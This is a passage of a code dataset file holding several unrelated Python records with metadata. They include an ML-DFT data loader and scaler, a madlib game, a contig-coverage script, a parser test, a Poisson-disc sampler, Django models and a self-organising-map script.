Fingerprint shape: \", full_train_fp_np.shape)\n print(\"Original LDOS shape: \", full_train_ldos_np.shape)\n print(\"Reading Fingerprint and LDOS dataset\")\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n for sshot in range(args.num_train_snapshots):\n print(\"Rank: %d, Reading train snapshot %d\" % (hvd.rank(), sshot))\n\n full_train_fp_np[sshot, :, :, :, :] = np.load(args.fp_dir + args.fp_data_fpath + \\\n \"_snapshot%d.npy\" % (sshot))\n\n full_train_ldos_np[sshot, :, :, :, :] = np.load(args.ldos_dir + args.ldos_data_fpath + \\\n \"_snapshot%d.npy\" % (sshot))\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n print(\"Rank: %d, Reading validation snapshot %d\" % (hvd.rank(), args.validation_snapshot))\n validation_fp_np = np.load(args.fp_dir + args.fp_data_fpath + \\\n \"_snapshot%d.npy\" % (args.validation_snapshot))\n validation_ldos_np = np.load(args.ldos_dir + args.ldos_data_fpath + \\\n \"_snapshot%d.npy\" % (args.validation_snapshot))\n \n hvd.allreduce(torch.tensor(0), name='barrier')\n \n if (not args.no_testing):\n print(\"Rank: %d, Reading test snapshot %d\" % (hvd.rank(), args.test_snapshot))\n test_fp_np = np.load(args.fp_dir + args.fp_data_fpath + \\\n \"_snapshot%d.npy\" % (args.test_snapshot))\n test_ldos_np = np.load(args.ldos_dir + args.ldos_data_fpath + \\\n \"_snapshot%d.npy\" % (args.test_snapshot))\n else:\n test_fp_np = None\n test_ldos_np = None\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n\n # Pick subset of FP vector that the user requested\n fp_idxs = subset_fp(args)\n\n if (hvd.rank() == 0):\n print(\"Subsetting FP dataset\")\n print(\"FP_idxs: \", fp_idxs)\n\n full_train_fp_np = full_train_fp_np[:, :, :, :, fp_idxs]\n validation_fp_np = validation_fp_np[:, :, :, fp_idxs]\n if (not args.no_testing):\n test_fp_np = test_fp_np[:, :, :, fp_idxs]\n\n\n # Pick subset of LDOS vector that the user requested\n ldos_idxs = subset_ldos(args)\n\n if (hvd.rank() == 0):\n print(\"Subsetting LDOS dataset\") \n print(\"LDOS_idxs: \", ldos_idxs)\n \n full_train_ldos_np = full_train_ldos_np[:, :, :, :, ldos_idxs]\n validation_ldos_np = validation_ldos_np[:, :, :, ldos_idxs]\n if (not args.no_testing):\n test_ldos_np = test_ldos_np[:, :, :, ldos_idxs]\n\n\n fp_shape = validation_fp_np.shape\n ldos_shape = validation_ldos_np.shape\n\n fp_pts = fp_shape[0] * fp_shape[1] * fp_shape[2]\n ldos_pts = ldos_shape[0] * ldos_shape[1] * ldos_shape[2]\n\n # Grid inconsistent\n if (fp_pts != ldos_pts):\n print(\"\\n\\nError in num grid points: fp_pts %d and ldos_pts %d\\n\\n\" % (fp_pts, ldos_pts));\n exit(0);\n\n # Bidirection with density prediction\n if (ldos_shape[3] == 1 and (args.model_lstm_network and not args.no_bidirection)):\n print(\"\\n\\nError cannot use bidirectional LSTM when predicting densities. Please use unidirectional LSTM or Feedforward only. Exiting.\\n\\n\")\n exit(0);\n\n\n args.grid_pts = fp_pts\n\n args.train_pts = args.grid_pts * args.num_train_snapshots\n args.validation_pts = args.grid_pts\n args.test_pts = args.grid_pts\n\n # Vector lengths\n args.fp_length = fp_shape[3]\n args.ldos_length = ldos_shape[3]\n\n \n if (hvd.rank() == 0):\n print(\"Grid_pts %d\" % args.grid_pts)\n print(\"Train_pts %d\" % args.train_pts)\n print(\"Validation_pts %d\" % args.validation_pts)\n print(\"Test pts %d\" % args.test_pts)\n print(\"Final FP vector length: %d\" % args.fp_length)\n print(\"Final LDOS vector length: %d\" % args.ldos_length)\n print(\"Reshaping Datasets\")\n \n\n # Reshape tensor datasets such that \n # NUM_SNAPSHOTS x 200 x 200 x 200 x VEC_LEN => (NUM_SNAPSHOTS * 200^3) x VEC_LEN\n full_train_fp_np = full_train_fp_np.reshape([args.train_pts, args.fp_length])\n full_train_ldos_np = full_train_ldos_np.reshape([args.train_pts, args.ldos_length])\n\n validation_fp_np = validation_fp_np.reshape([args.validation_pts, args.fp_length])\n validation_ldos_np = validation_ldos_np.reshape([args.validation_pts, args.ldos_length])\n \n if (not args.no_testing):\n test_fp_np = test_fp_np.reshape([args.test_pts, args.fp_length])\n test_ldos_np = test_ldos_np.reshape([args.test_pts, args.ldos_length])\n \n\n # Scale fingerprints\n full_train_fp_np, validation_fp_np, test_fp_np = \\\n scale_data(args, \"fp\", \\\n full_train_fp_np, \\\n validation_fp_np, \\\n test_fp_np, \\\n args.fp_log, \\\n args.fp_row_scaling, \\\n args.fp_norm_scaling,\\\n args.fp_max_only, \\\n args.fp_standard_scaling)\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n # Scale ldos\n full_train_ldos_np, validation_ldos_np, test_ldos_np = \\\n scale_data(args, \"ldos\", \\\n full_train_ldos_np, \\\n validation_ldos_np, \\\n test_ldos_np, \\\n args.ldos_log, \\\n args.ldos_row_scaling, \\\n args.ldos_norm_scaling,\\\n args.ldos_max_only, \\\n args.ldos_standard_scaling)\n\n\n # Save modified input/outputs\n if (hvd.rank() == 0 and args.save_training_data):\n\n print(\"Saving training data.\")\n\n np.save(args.model_dir + \"/full_train_fp_np\", full_train_fp_np)\n np.save(args.model_dir + \"/validation_fp_np\", validation_fp_np)\n np.save(args.model_dir + \"/test_fp_np\", test_fp_np)\n\n np.save(args.model_dir + \"/full_train_ldos_np\", full_train_ldos_np)\n np.save(args.model_dir + \"/validation_ldos_np\", validation_ldos_np)\n np.save(args.model_dir + \"/test_ldos_np\", test_ldos_np)\n\n\n\n # Create Pytorch tensors\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n print(\"Rank: %d, Creating train tensors\" % hvd.rank())\n # Create PyTorch Tensors (and Datasets X/Y) from numpy arrays\n full_train_fp_torch = torch.tensor(full_train_fp_np, dtype=torch.float32)\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n full_train_ldos_torch = torch.tensor(full_train_ldos_np, dtype=torch.float32)\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n\n print(\"Rank: %d, Creating validation tensors\" % hvd.rank()) \n validation_fp_torch = torch.tensor(validation_fp_np, dtype=torch.float32)\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n validation_ldos_torch = torch.tensor(validation_ldos_np, dtype=torch.float32)\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n\n print(\"Rank: %d, Creating test tensors\" % hvd.rank()) \n test_fp_torch = torch.tensor(test_fp_np, dtype=torch.float32)\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n test_ldos_torch = torch.tensor(test_ldos_np, dtype=torch.float32) \n hvd.allreduce(torch.tensor(0), name='barrier')\n\n\n print(\"Rank: %d, Creating tensor datasets\" % hvd.rank())\n # Create fp (inputs) and ldos (outputs) Pytorch Dataset\n train_dataset = torch.utils.data.TensorDataset(full_train_fp_torch, full_train_ldos_torch)\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n validation_dataset = torch.utils.data.TensorDataset(validation_fp_torch, validation_ldos_torch)\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n test_dataset = torch.utils.data.TensorDataset(test_fp_torch, test_ldos_torch)\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n\n return (train_dataset, validation_dataset, test_dataset)\n\n\n\n\n\n\n\n\n###-----------------------------------------------------------------------###\n\n# Normalize FP or LDOS\ndef scale_data(args, data_name, \\\n data_train, data_validation, data_test, \\\n apply_log=False, \\\n row_scaling=False, \\\n norm_scaling=False, max_only=False, \\\n standard_scaling=False):\n\n if (data_test == None and not args.calc_training_norm_only):\n if (hvd.rank() == 0):\n print(\"\\n\\nData_test is set as place holder. Scaler calculation is off.\\n\\n\")\n data_test = np.ones([1, data_train.shape[1]])\n elif (data_test == None):\n data_test = np.ones([1, data_train.shape[1]])\n\n if (len(data_train.shape) != 2 or len(data_validation.shape) != 2 or len(data_test.shape) != 2):\n if (hvd.rank() == 0):\n print(\"\\nIssue in %s data shape lengths (train, valid, test): (%d, %d, %d), expected length 2. Exiting.\\n\\n\" \\\n % (data_name, len(data_train.shape), len(data_validation.shape), len(data_test.shape)))\n exit(0);\n \n # Number of elements in each sample vector\n data_length = data_train.shape[1]\n\n # Apply log function to the data\n if (apply_log):\n if (hvd.rank() == 0):\n print(\"Applying Log function to %s\" % data_name) \n\n train_min = np.min(data_train)\n validation_min = np.min(data_validation)\n test_min = np.min(data_test)\n \n log_shift = np.array([1e-8])\n\n train_min += log_shift\n validation_min += log_shift\n test_min += log_shift\n\n if (train_min <= 0.0 or validation_min <= 0.0 or test_min <= 0.0):\n if (hvd.rank() == 0):\n print(\"\\nApplying the log fn to %s fails because there are values <= 0. Exiting.\\n\\n\" % data_name)\n exit(0);\n\n np.save(args.model_dir + \"/%s_log_shift\" % data_name, log_shift)\n\n data_train = np.log(data_train + log_shift)\n data_validation = np.log(data_validation + log_shift)\n data_test = np.log(data_test + log_shift)\n \n # Row vs total scaling\n if (row_scaling and (norm_scaling or standard_scaling)):\n scaling_factors = np.zeros([2, data_length])\n scaling_factors_fname = \"/%s_factor_row\" % data_name\n else:\n scaling_factors = np.zeros([2, 1])\n scaling_factors_fname = \"/%s_factor_total\" % data_name\n\n # Scale features\n if (norm_scaling or standard_scaling):\n # Apply data normalizations\n for row in range(data_length):\n\n # Row scaling\n if (row_scaling):\n if (standard_scaling):\n\n if (args.calc_training_norm_only):\n data_meanv = np.mean(data_train[:, row]) \n data_stdv = np.std(data_train[:, row])\n \n else: \n data_meanv = np.mean(np.concatenate((data_train[:, row], \\\n data_validation[:, row], \\\n data_test[:, row]), axis=0))\n data_stdv = np.std(np.concatenate((data_train[:, row], \\\n data_validation[:, row], \\\n data_test[:, row]), axis=0))\n \n data_train[:, row] = (data_train[:, row] - data_meanv) / data_stdv\n data_validation[:, row] = (data_validation[:, row] - data_meanv) / data_stdv\n data_test[:, row] = (data_test[:, row] - data_meanv) / data_stdv\n \n scaling_factors[0, row] = data_meanv\n scaling_factors[1, row] = data_stdv\n\n else:\n if (max_only):\n data_minv = 0\n else:\n if (args.calc_training_norm_only):\n data_minv = np.min(data_train[:, row])\n else:\n data_minv = np.min(np.concatenate((data_train[:, row], \\\n data_validation[:, row], \\\n data_test[:, row]), axis=0))\n if (args.calc_training_norm_only):\n data_maxv = np.max(data_train[:, row])\n else:\n data_maxv = np.max(np.concatenate((data_train[:, row], \\\n data_validation[:, row], \\\n data_test[:, row]), axis=0))\n\n if (data_maxv - data_minv < 1e-12):\n print(\"\\nNormalization of %s error. max-min ~ 0. Exiting. \\n\\n\" % data_name)\n exit(0);\n \n data_train[:, row] = (data_train[:, row] - data_minv) / (data_maxv - data_minv)\n data_validation[:, row] = (data_validation[:, row] - data_minv) / (data_maxv - data_minv)\n data_test[:, row] = (data_test[:, row] - data_minv) / (data_maxv - data_minv)\n \n # No row scaling\n else:\n if (standard_scaling):\n\n if (args.calc_training_norm_only):\n data_mean = np.mean(data_train)\n data_std = np.std(data_train)\n\n else:\n data_mean = np.mean(np.concatenate((data_train, \\\n data_validation, \\\n data_test), axis=0))\n data_std = np.std(np.concatenate((data_train, \\\n data_validation, \\\n data_test), axis=0))\n \n data_train = (data_train - data_mean) / data_std\n data_validation = (data_validation - data_mean) / data_std\n data_test = (data_test - data_mean) / data_std\n \n scaling_factors[0, row] = data_mean\n scaling_factors[1, row] = data_std\n \n else: \n if (max_only):\n data_min = 0\n else:\n if (args.calc_training_norm_only):\n data_min = np.min(data_train)\n else:\n data_min = np.min(np.concatenate((data_train, \\\n data_validation, \\\n data_test), axis=0)) \n if (args.calc_training_norm_only):\n data_max = np.max(data_train)\n else:\n data_max = np.max(np.concatenate((data_train, \\\n data_validation, \\\n data_test), axis=0))\n \n if (data_max - data_min < 1e-12):\n print(\"\\nNormalization of %s error. max-min ~ 0. Exiting\\n\\n\" % data_name)\n exit(0);\n\n data_train = (data_train - data_min) / (data_max - data_min)\n data_validation = (data_validation - data_min) / (data_max - data_min)\n data_test = (data_test - data_min) / (data_max - data_min)\n\n scaling_factors[0, row] = data_min\n scaling_factors[1, row] = data_max\n\n\n if (hvd.rank() == 0):\n if (row_scaling):\n if (standard_scaling):\n print(\"%s Row: %g, Mean: %4.4f, Std: %4.4f\" % (data_name, row, scaling_factors[0, row], scaling_factors[1, row]))\n else:\n print(\"%s Row: %g, Min: %4.4f, Max: %4.4f\" % (data_name, row, scaling_factors[0, row], scaling_factors[1, row]))\n else: \n if (standard_scaling):\n print(\"%s Total, Mean: %4.4f, Std: %4.4f\" % (data_name, scaling_factors[0, 0], scaling_factors[1, 0]))\n else:\n print(\"%s Total, Min: %4.4f, Max: %4.4f\" % (data_name, scaling_factors[0, 0], scaling_factors[1, 0]))\n\n if (row == 0):\n if (row_scaling):\n if (standard_scaling):\n scaling_factors_fname += \"_standard_mean_std\"\n else:\n scaling_factors_fname += \"_min_max\"\n\n else: \n if (standard_scaling):\n scaling_factors_fname += \"_standard_mean_std\"\n else:\n scaling_factors_fname += \"_min_max\"\n\n # No Row scaling\n break;\n \n # No LDOS scaling\n else: \n if (hvd.rank() == 0):\n print(\"Not applying scaling to %s.\" % data_name)\n # Identity scaling\n scaling_factors[0,0] = 0.0\n scaling_factors[1,0] = 1.0\n scaling_factors_fname += \"_min_max\"\n \n # Save normalization coefficients\n np.save(args.model_dir + scaling_factors_fname, scaling_factors)\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n return (data_train, data_validation, data_test)\n\n\n\n\n\n\n\n###-----------------------------------------------------------------------###\n\n# Take subset of FP inputs\n# Options:\n# --power-spectrum-only\n# --no-coords\n# --no-bispectrum\ndef subset_fp(args): \n\n # No subset requested\n if (not (args.no_bispectrum or args.power_spectrum_only or args.no_coords)):\n return np.arange(args.fp_length)\n\n\n # Store subset elements\n fp_idxs = np.array([])\n\n if (args.no_bispectrum):\n if(hvd.rank() == 0):\n print(\"Removing bispectrum components from the SNAP FP (use coords only).\")\n\n return (np.append(fp_idxs, [0,1,2])).astype(int)\n\n\n # User only the power spectrum elements in fingerprints\n if (args.power_spectrum_only):\n if(hvd.rank() == 0):\n print(\"Using FP power spectrum only.\")\n\n fp_idxs = np.append(fp_idxs, [0,1,2])\n\n bs_length = args.fp_length - 3\n twojmax = 0\n\n count = 0\n while (count < bs_length): \n twojmax += 1\n \n count = 0\n for j1 in range(0, twojmax + 1):\n for j2 in range(0, j1 + 1):\n for j in range(j1 - j2, min(twojmax, j1 + j2) + 1, 2):\n\n if (j >= j1): \n if (j2 == 0):\n fp_idxs = np.append(fp_idxs, count + 3) \n count += 1\n\n print(\"Rank: %d, twojmax %d, bs_length %d\" % (hvd.rank(), twojmax, count))\n \n fp_idxs = fp_idxs.astype(int)\n print(\"Power Spectrum idx: \", fp_idxs)\n\n if (count != bs_length):\n print(\"Error: could not find power spectrum. bs_length = %d and counted_elements = %d\" % (bs_length, count))\n else:\n fp_idxs = np.arange(args.fp_length)\n\n # The first 3 elements in FPs are coords and the rest are bispectrum components\n if (args.no_coords):\n if(hvd.rank() == 0):\n print(\"Removing X/Y/Z coords from the SNAP FP.\")\n fp_idxs = fp_idxs[3:]\n\n else:\n if(hvd.rank() == 0):\n print(\"Removing X/Y/Z coords from the SNAP FP.\")\n \n return fp_idxs.astype(int)\n\n\n# Take subset of LDOS outputs\n# Current no option available\ndef subset_ldos(args):\n fstart = args.feat_start\n fstop = args.feat_stop\n\n sub_idxs = np.arange(fstart, fstop)\n\n return sub_idxs.astype(int)\n #return np.arange(args.ldos_length)\n","sub_path":"ml-dft-sandia/networks/models/fp_ldos_feedforward/src/data_loaders.py","file_name":"data_loaders.py","file_ext":"py","file_size_in_byte":30261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"558409500","text":"import requests\nimport json\n\n\ndef Nexeedpost(payload):\n # sending post request and saving response as response object\n url = \"https://demo.bosch-nexeed.com/cpm/ppm/v3/measurement\"\n\n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n try:\n r = requests.post(url, data=json.dumps(payload), headers=headers)\n\n pastebin_url = r.content\n\n # Response from Bosch URL\n if pastebin_url == \"{}\":\n print(\"Successfully Posted to Nexeed\")\n else:\n print(\"URL Response: %s\" % pastebin_url)\n\n except:\n print(\"Nexeed unreachable\")\n\n","sub_path":"App/Post_to_Nexeed.py","file_name":"Post_to_Nexeed.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178490553","text":"import re\n\ndef welcome_print():\n print(\"\"\" \n Welcome to madlib game!\n all you need is to think of an example of the below vocabs \n \"\"\")\n\ndata=['Adjective','Adjective','A First Name','Past Tense Verb','A First Name','Adjective','Adjective',\n'Plural Noun','Large Animal','Small Animal',\"A Girl's Nam\",'Adjective','Plural Noun','Adjective','Plural Noun',\n'Number 1-50',\"First Name's\",'Number','Plural Noun','Number','Plural Noun']\n\nnew_data=[]\n\ndef input_vocabs():\n for i in range (len(data)):\n input_val=input('>> Enter %s '%(data[i]))\n new_data.append(input_val)\n\n\nif __name__== '__main__':\n welcome_print()\n input_vocabs() \n\n\ndef read_template(path):\n try:\n with open(path) as file:\n return file.read()\n except FileNotFoundError :\n raise FileNotFoundError('The file not found')\n \n\ndef parse_template(read_script):\n modified_script=re.sub('{[^}]+}','{}',read_script)\n removed_str_parts=tuple(re.findall(\"{(.*?)}\",read_script))\n return modified_script, removed_str_parts\n\n\ndef merge(parsed_script,user_input):\n return parsed_script.format(*user_input)\n\n\n\ndef script_copy(merged_script):\n with open('./assets/new_assets.txt','wb') as script_write:\n return script_write.write(bytes(merged_script,'utf-8'))","sub_path":"madlib_cli/madlib.py","file_name":"madlib.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478706758","text":"import argparse\nimport numpy as np\nfrom operator import itemgetter\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n#############################################################################\n# Purpose: input a fasta table that contains the parsed output of bwa and calculate xcoverage of each contig\n# Decisions:\n# 1) When both sides of a read fall on same contig then add one to the coverage for bp from first tail to second tail of read\n# 2) When only side of a read fall on same contig then only add coverage to the bp that fall directly on that one read side (from tail to head)\n# 3) When done with calculating coverage along all contigs, take the median base coverage of that contig and divide it by \n# the length of that contig to get the xcoverage stat\n# \n#############################################################################\n\nparser = argparse.ArgumentParser(description='rename reads to have FW and RV')\nparser.add_argument('ifn_bwa_table', metavar='', type=str, help='assembly output of contigs')\nparser.add_argument('ifn_name_map', metavar='', type=str, help='Original_contig new_contig')\nparser.add_argument('ofn_contig_coverage', metavar='', type=str, help='renamed fasta')\nparser.add_argument('ofn_contig_coverage_whole_molecules_dir', metavar='', type=str, help='renamed fasta')\n\nargs = parser.parse_args()\n\n\n# connect contig name to length\n# initialize a 0-array that is the length of a contig connected to the name of a contig\ncontig_to_cov_table = {}\nwith open(args.ifn_name_map) as contigs:\n for line in contigs:\n line = line.split()\n contig = line[1]\n length = int(line[2])\n contig_to_cov_table[contig] = np.zeros((length,), dtype=int)\n\nmap_col_index = {}\nwith open(args.ifn_bwa_table) as mapfile:\n line = mapfile.readline()\n header = line.split()\n index = 0\n for col in header:\n map_col_index[col] = index\n index += 1\n\nwith open(args.ifn_bwa_table) as mapfile:\n next(mapfile)\n linenum = 1\n for line in mapfile:\n linenum += 1\n pair = line.split()\n strand1 = pair[map_col_index['strand1']]\n strand2 = pair[map_col_index['strand2']]\n contig1 = pair[map_col_index['contig1']]\n contig2 = pair[map_col_index['contig2']]\n if (contig1 == contig2) & (strand1 == strand2):\n print(contig1,contig2,strand1,strand2)\n continue\n head1 = int(pair[map_col_index['coord1']])\n head2 = int(pair[map_col_index['coord2']])\n tail1 = int(pair[map_col_index['back_coord1']])\n tail2 = int(pair[map_col_index['back_coord2']])\n if contig1 == contig2:\n if strand1 == '1': \n start_coord = tail1-1\n stop_coord = tail2\n else: \n start_coord = tail2-1\n stop_coord = tail1\n for bp in range(start_coord,stop_coord):\n contig_to_cov_table[contig1][bp] += 1\n else:\n if strand1 == '1':\n start_coord = tail1 - 1\n stop_coord = head1\n else:\n start_coord = head1 - 1\n stop_coord = tail1\n for bp in range(start_coord,stop_coord):\n contig_to_cov_table[contig1][bp] += 1\n if strand2 == '1':\n start_coord = tail2 - 1\n stop_coord = head2\n else:\n start_coord = head2 - 1\n stop_coord = tail2\n for bp in range(start_coord,stop_coord):\n contig_to_cov_table[contig2][bp] += 1\n\n\nographdir = args.ofn_contig_coverage_whole_molecules_dir\nofile = open(args.ofn_contig_coverage,'w+')\ncontig_covs = [(k,v) for k,v in contig_to_cov_table.items()]\nsorted_contig_covs = sorted(contig_covs, key=itemgetter(0))\nofile.write(\"contig coverage\\n\")\n\n\nfor item in sorted_contig_covs:\n contig = item[0]\n cov_arr = contig_to_cov_table[contig]\n contig_length = len(cov_arr)\n median_cov = np.sum(cov_arr)/contig_length\n ofile.write(contig + \" \" + str(median_cov) + \"\\n\")\n hist = plt.plot(range(contig_length),cov_arr)\n plt.title(contig + \"coverage distribution\")\n plt.xlabel('base')\n plt.ylabel('coverage')\n ofn_graph = ographdir + '/' + contig + '_cov.pdf'\n plt.savefig(ofn_graph)\n plt.close()\n\n \n \n ","sub_path":"md/Python/get_coverage.py","file_name":"get_coverage.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"1195482","text":"# -*- coding: utf-8 -*-\r\nfrom unittest import mock\r\nimport unittest\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nimport parsers\r\nfrom parsers.grandbulvar import GrandBulvarParser\r\nfrom parsers.vparsers import StatusParser\r\n\r\nfrom tests.parsers import ParserTestCaseMixin\r\n\r\n\r\n@mock.patch.object(parsers.grandbulvar.RequestMixin, \"send_request\")\r\nclass GrandBulvarParserTest(ParserTestCaseMixin, unittest.TestCase):\r\n \r\n content = [\r\n BeautifulSoup(\r\n \"\"\"\r\n
    \r\n
    \r\n \r\n
    \r\n

    \r\n 48 \r\n m2\r\n \r\n

    \r\n

    \r\n A.0.01 / Invest

    \r\n
    \r\n
    \r\n
    \r\n

    Pokoje

    \r\n

    \r\n 2

    \r\n
    \r\n
    \r\n

    Taras

    \r\n

    \r\n -

    \r\n
    \r\n
    \r\n

    Piętro

    \r\n

    \r\n 0

    \r\n
    \r\n
    \r\n

    Status

    \r\n

    \r\n Zajęte

    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \"\"\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    LPNazwa pomieszczeniaPow.
    (m2)
    1korytarz4.90
    2salon+aneks kuchenny23.82
    3pokój12.64
    4łazienka5.91
    \r\n Zadaj pytanie\r\n Pobierz kartę\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \"\"\", \"lxml\")\r\n ]\r\n content_empty = [ BeautifulSoup(\"\", \"lxml\") ]\r\n \r\n parser = GrandBulvarParser\r\n records_count = 1\r\n test_record_index = 0\r\n test_record = {\r\n \"number\": \"A.0.01 / Invest\",\r\n \"rooms\": 2,\r\n \"area\": 48.0,\r\n \"floor\": 0,\r\n \"status\": StatusParser.RESERVED,\r\n \"plan\": \"http://rockfield.pl/wp-content/uploads/2017/11/A.0.01-APARTAMENT.pdf\",\r\n \"fid\": \"A.0.01 / Invest\"\r\n }","sub_path":"tests/parsers/test_grandbulvar.py","file_name":"test_grandbulvar.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63033781","text":"from matplotlib.pyplot import imshow\nfrom numpy import *\nfrom random import sample\n\n\ndef translate_point(point, translation):\n print(point, translation)\n return (point[0] + translation[0]), (point[1] + translation[1])\n\ndef generate_candidates(point, selector, n):\n candidates = set()\n while len(candidates) < n:\n # generate random points inside the selector's bounding box\n metacandidate = random.randint(0, selector.shape[0]),\\\n random.randint(0, selector.shape[1])\n # accept points covered by the selector\n if selector[metacandidate]:\n candidates.add(metacandidate)\n candidates = [translate_point(candidate, point) for candidate in candidates]\n return candidates\n\ndef distance_between_points(point_1, point_2):\n # Pythagorean theorem\n return sqrt((point_1[0] - point_2[0])**2 + (point_1[1] - point_2[1])**2)\n\ndistance_between_points((1, 1), (5, 4))\n\ndef generate_annular_selector(r_o, r_i):\n size = int(ceil(2 * r_o + 1))\n center = (r_o, r_o)\n selector = zeros((size, size)) # bounding box\n for y in range(size):\n for x in range(size):\n distance = distance_between_points((x, y), center)\n if distance > r_i and distance < r_o + 1:\n selector[y][x] = 1\n return selector\n\ndef check_collisions(grid, candidate, collider):\n collider_t = [translate_point(point, candidate)\n for point in grid_to_list(collider)]\n for point in collider_t:\n if grid[point]:\n return True\n return False\n\n\nif __name__ == \"__main__\":\n r = 3.0\n sx = 15 # Physical grid size (external units, e.g. meters)\n sy = 15\n n_candidates = 30\n n = sx * sy\n cell_size_upper_bound = r / sqrt(n)\n cell_size = 10 ** (ceil(log10(cell_size_upper_bound)) - 1)\n\n s1 = int(sx / cell_size) # Logical grid size (internal units for Bridson's algorithm)\n s2 = int(sy / cell_size)\n sr = r / cell_size # Logical Poisson disc radius\n\n grid = zeros((s1, s2))\n grid = grid.astype(int)\n grid.fill(-1)\n start_point = random.randint(0, grid.shape[0]), random.randint(0, grid.shape[1])\n print(start_point)\n\n grid[start_point] = 0 # 0 is the first point index so can be hardcoded\n active_points = {start_point} # Start the active points set\n\n while active_points:\n active_point = sample(active_points, 1)[0]\n print(active_point)\n annulus = generate_annular_selector(2 * r, r)\n collider = generate_annular_selector(r, 0)\n candidates = generate_candidates(active_point, annulus, n_candidates)\n succeeded = False\n for candidate in candidates:\n if not check_collisions(grid, candidate, collider): # check if point can fit\n active_points.add(candidate) # add point to active_points\n grid[int(candidate)] = len(active_points) - 1 # add index to grid\n succeeded = True\n if not succeeded:\n active_points.remove(active_point)\n\n","sub_path":"poisson.py","file_name":"poisson.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"520161028","text":"from django.db import models\nfrom django.conf import settings\n\nclass Funcionario(models.Model):\n\tuser = models.ForeignKey(settings.AUTH_USER_MODEL)\n\nclass Agenda(models.Model):\n\tevento = models.CharField(max_length=100)\n\tlugar = models.CharField(max_length=200)\n\tfecha_inicio = models.DateTimeField()\n\tfecha_fin = models.DateTimeField()\n\tcomentario = models.TextField()\n\tinvitados = models.ManyToManyField(Funcionario)\n\ttipo = models.CharField(max_length=15)\n\nclass Evidencia(models.Model):\n\tcomentario = models.TextField()\n\tarchivo = models.FileField(upload_to='evidencia')\n\tagenda = models.ForeignKey(Agenda)\n\tfuncionario = models.ForeignKey(Funcionario)\n\n","sub_path":"apps/agenda/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532510213","text":"\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\n\r\n\r\ndef read_animals():\r\n\t#returns a list with list \r\n\t# returns a list of animals with attributes\r\n\tf = open('animals.dat','r') \r\n\tanimal_list = []\r\n\tanimal = []\r\n\tfor _ in range(32):\r\n\t\tanimal = []\r\n\t\tfor _ in range(84):\r\n\t\t\tattribute = f.read(1)\r\n\t\t\tanimal.append(int(attribute))\r\n\t\t\tf.read(1)\r\n\t\tanimal_list.append(animal)\r\n\treturn animal_list\r\ndef read_animals_names():\r\n\t#returns a list with animal names\r\n\tf = open('animalnames.dat','r') \r\n\tanimal_list = []\r\n\tfor _ in range(32):\r\n\t\tanimal_list.append(f.readline())\r\n\r\n\treturn animal_list\r\ndef similiarity(animal,W):\r\n\td = None\r\n\tindex = None\r\n\tfor i in range(len(W)):\r\n\t\tdist = float((animal - W[i])*np.transpose(animal - W[i]))\r\n\t\tif i == 0:\r\n\t\t\td = dist\r\n\t\t\tindex = 0\r\n\t\telif (dist) < d:\r\n\t\t\td = dist\r\n\t\t\tindex = i\r\n\treturn index\r\n\r\ndef output(animal_list,W):\r\n\tlist_of_index_values = []\r\n\tanimal_index = 0\r\n\tfor animal in animal_list:\r\n\t\tanimal_index = animal_index + 1\r\n\t\td = None\r\n\t\tindex = None\r\n\t\tfor i in range(len(W)):\r\n\t\t\tdist = float((animal - W[i])*np.transpose(animal - W[i]))\r\n\r\n\t\t\tif i == 0:\r\n\t\t\t\td = dist\r\n\t\t\t\tindex = i\r\n\t\t\telif (dist) < d:\r\n\t\t\t\td = dist\r\n\t\t\t\tindex = i\r\n\t\tlist_of_index_values.append([index,animal_index])\r\n\treturn list_of_index_values\r\n\r\n\r\ndef initialize_weights(nodes, input_dimension ):\r\n\t#100 nodes and each node have 84 attributes each attribute has a weight\r\n W = np.matrix(np.random.uniform(0,1,input_dimension))\r\n for x in range(nodes-1):\r\n W = np.r_[W,np.matrix(np.random.uniform(0,1,input_dimension))]\r\n return W\r\n\r\ndef sequencial_iteration(animal_list,W,neighbourhood,step):\r\n\tfor animal in animal_list:\r\n\r\n\t\tindex = similiarity(animal,W)\r\n\t\tif neighbourhood == 0 :\r\n\t\t\tW[(index)] = W[(index)] + step*(animal-W[(index)])\r\n\r\n\t\telse:\r\n\t\t\tfor 